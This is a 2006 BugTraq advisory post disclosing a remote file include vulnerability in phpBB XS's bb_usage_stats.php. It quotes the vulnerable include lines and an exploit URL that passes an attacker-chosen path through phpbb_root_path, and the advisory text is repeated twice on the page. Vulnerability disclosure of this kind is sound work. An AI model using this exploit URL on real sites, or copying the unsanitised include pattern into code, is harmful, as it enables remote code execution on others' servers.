BugTraq
Back to list
|
Post reply
SolpotCrew Advisory #10 - phpBB XS (phpbb_root_path) Remote File Include
Sep 15 2006 03:49PM
jong_amq hotmail com
#############################SolpotCrew Community################################
#
# phpBB XS (phpbb_root_path) Remote File Include
#
# Download file : http://www.phpbbxs.eu/dload.php?action=category&cat_id=2
#
########################################################################
#########
#
#
# Bug Found By : NoGe a.k.a da_jackass
#
# contact: jong_amq (at) hotmail (dot) com [email concealed]
#
# Website : http://nyubicrew.org/adv/Noge_adv_02.txt
#
########################################################################
########
#
#
# Greetz: skulmatic[thanks for sharing knowledge] h4ntu[for the video] olibekas solpotcrew PremanMedan
# yooogy[pa bozz] siwa^lima sagu mousekill ilalang13
# #papmahackerlink #nyubi #maluku-hacker #papuahacker
#
########################################################################
#######
# Vulnerable found in bb_usage_stats.php
line 24 include($phpbb_root_path . 'bb_usage_stats/includes/bb_usage_stats_constants.' . $phpEx);
line 25 include($phpbb_root_path . 'bb_usage_stats/language/lang_' . $board_config['default_lang'] . '/bb_usage_stats_lang.' . $phpEx);
line 26 include($phpbb_root_path . 'bb_usage_stats/includes/bb_usage_stats_functions.' . $phpEx);
# Exploit
http://victim.com/[path]/bb_usage_stats/include/bb_usage_stats.php?phpbb
_root_path=[evilcode]
######################################E.O.F#############################
#####
[ reply ]
Privacy Statement
Copyright 2010, SecurityFocus
#
# phpBB XS (phpbb_root_path) Remote File Include
#
# Download file : http://www.phpbbxs.eu/dload.php?action=category&cat_id=2
#
########################################################################
#########
#
#
# Bug Found By : NoGe a.k.a da_jackass
#
# contact: jong_amq (at) hotmail (dot) com [email concealed]
#
# Website : http://nyubicrew.org/adv/Noge_adv_02.txt
#
########################################################################
########
#
#
# Greetz: skulmatic[thanks for sharing knowledge] h4ntu[for the video] olibekas solpotcrew PremanMedan
# yooogy[pa bozz] siwa^lima sagu mousekill ilalang13
# #papmahackerlink #nyubi #maluku-hacker #papuahacker
#
########################################################################
#######
# Vulnerable found in bb_usage_stats.php
line 24 include($phpbb_root_path . 'bb_usage_stats/includes/bb_usage_stats_constants.' . $phpEx);
line 25 include($phpbb_root_path . 'bb_usage_stats/language/lang_' . $board_config['default_lang'] . '/bb_usage_stats_lang.' . $phpEx);
line 26 include($phpbb_root_path . 'bb_usage_stats/includes/bb_usage_stats_functions.' . $phpEx);
# Exploit
http://victim.com/[path]/bb_usage_stats/include/bb_usage_stats.php?phpbb
_root_path=[evilcode]
######################################E.O.F#############################
#####
[ reply ]